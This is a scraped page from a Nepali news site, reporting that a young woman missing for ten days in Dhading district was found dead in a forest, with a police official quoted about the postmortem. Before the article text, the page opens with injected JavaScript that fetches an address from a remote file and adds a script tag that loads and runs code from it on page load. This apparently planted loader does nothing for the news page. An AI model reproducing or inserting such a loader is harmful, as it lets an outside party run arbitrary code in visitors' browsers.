;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); धादिङमा १० दिनदेखि बेपत्ता युवतीको शव फेला – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • धादिङमा १० दिनदेखि बेपत्ता युवतीको शव फेला
Breaking News

धादिङमा १० दिनदेखि बेपत्ता युवतीको शव फेला

१० साउन, काठमाडौं । धादिङमा १० दिनदेखि बेपत्ता युवती मृत भेटिएकी छन् ।
धादिङ जिल्लाको गजुरी गाउँपालिका–८, पर्वाङस्थित जंगलमा २० वर्षीया सम्झना रोकाको शव भेटिएको गजुरीका डीएसपी युवराज खड्काले बताएका छन् ।

उनका अनुसार शव सडेको अवस्थामा बरामद भएको छ । ‘जाँचका लागि शव उठाइसकेका छौं’ खड्काले भने, ‘जिल्लामै पोष्टमार्टम गर्ने कि अन्यत्र लैजाने टुंगो लागे सकेको छैन ।’
मृत्युको कारण पोष्टमार्टम रिपोर्ट आएपछि मात्र खुल्नेछ । घटनास्थलबाट उनको घर ३ सय मिटरको दूरीमा छ |

फेसबुक प्रतिक्रियाहरु